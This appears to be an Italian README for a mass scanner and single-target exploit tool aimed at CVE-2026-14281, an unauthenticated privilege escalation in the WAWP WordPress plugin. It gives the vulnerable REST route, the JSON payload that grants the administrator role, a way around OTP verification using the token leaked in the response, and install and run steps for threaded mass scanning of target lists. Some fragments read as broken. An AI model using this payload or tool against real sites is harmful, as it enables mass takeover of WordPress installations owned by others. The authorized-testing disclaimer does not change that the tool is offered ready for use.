
Scanner di massa ed exploit per singolo target per CVE-2026-14281, un'escalation di privilegi non autenticata nel plugin WordPress Automation Web Platform tramite la registrazione REST.
Scanner di massa + Exploit per singolo target per CVE-2026-14281 — una privilege escalation non autenticata nel plugin WordPress Automation Web Platform (WAWP)
<= 4.8.6.
Improper Privilege Management (CWE-269) nel plugin WordPress Automation Web Platform (di 101gen). Le versioni <= 4.8.6 sono interessate.
| Campo | Valore |
|---|---|
| CVE | CVE-2026-14281 |
| Tipo | Privilege Escalation non autenticata |
| CVSS | 9.8 (CRITICAL) |
| Auth | Nessuna richiesta |
| Interessate | Plugin WAWP <= 4.8.6 |
Il plugin espone una route REST pubblica:
POST /wp-json/wawp/v1/signup/<op>
Nessun controllo dei permessi. L'handler copia i wawp_custom_fields controllati dall'attaccante in update_user_meta() — nessuna allowlist. L'attaccante imposta:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Risultato: il nuovo account ottiene il ruolo administrator.
Il token OTP (otp_transient) viene restituito in chiaro nel corpo della risposta. Una richiesta GET con quel token lo contrassegna come verificato — nessuna email/SMS necessaria.
/wp-json/wawp/v1/signup/ con wp_capabilities: administrator/wp-login.php con le nuove credenziali/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: inserisci il file della lista dei target, il file di output (predefinito vuln.txt), il numero di thread (predefinito 20).
Verify Single: digita YA, inserisci l'URL del target. Lo strumento crea un admin temporaneo, verifica, poi esegue la pulizia.
vuln.txt contiene solo URL vulnerabili confermati, uno per riga:
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Usalo con saggezza. La conoscenza serve a proteggere, non a distruggere.